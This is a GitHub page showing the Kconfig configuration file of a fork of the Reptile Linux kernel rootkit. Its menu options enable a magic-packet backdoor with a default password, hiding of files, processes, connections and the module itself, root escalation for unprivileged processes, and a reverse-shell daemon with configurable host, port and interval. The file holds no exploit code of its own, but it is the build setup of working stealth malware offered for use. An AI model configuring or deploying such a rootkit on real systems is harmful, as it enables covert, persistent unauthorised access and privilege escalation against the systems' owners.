forked from f0rb1dd3n/Reptile
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Kconfig
90 lines (66 loc) · 1.88 KB
/
Kconfig
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
mainmenu "Reptile's configuration"
comment "Chose the features you wanna enable"
config CONFIG_BACKDOOR
bool "Backdoor"
default y
menu "Backdoor configuration"
depends on CONFIG_BACKDOOR
config MAGIC_VALUE
string "Magic value to magic packets"
default "hax0r"
config PASSWORD
string "Backdoor password"
default "s3cr3t"
config SRCPORT
int "Source port of magic packets"
default 666
range 0 65535
comment "END"
endmenu
config CONFIG_FILE_TAMPERING
bool "Hide specific file contents"
default y
menu "Name used in file tampering tags"
depends on CONFIG_FILE_TAMPERING
config TAG_NAME
string "Tag name that hide file contents"
default "reptile"
comment "END"
endmenu
config CONFIG_HIDE_PROC
bool "Hide process"
default y
config CONFIG_HIDE_DIR
bool "Hide files and directories"
default y
menu "Hide name (needed to create Reptile's folder)"
config HIDE
string "Hide name"
default "reptile"
comment "END"
endmenu
config CONFIG_HIDE_CONN
bool "Hide TCP and UDP connections"
default y
config CONFIG_AUTO_HIDE
bool "Hide kernel module itself"
default y
config CONFIG_GIVE_ROOT
bool "Enable give root to a process run by an unprivileged user"
default y
config CONFIG_RSHELL_ON_START
bool "Would you like to launch the reverse shell daemon on start?"
default n
menu "Reverse shell daemon configuration"
depends on CONFIG_RSHELL_ON_START
config LHOST
string "Host to receive the reverse shell"
default "127.0.0.1"
config LPORT
string "Port get the reverse shell"
default "4444"
config INTERVAL
string "How long is your interval? (in seconds)"
default "1800"
comment "END"
endmenu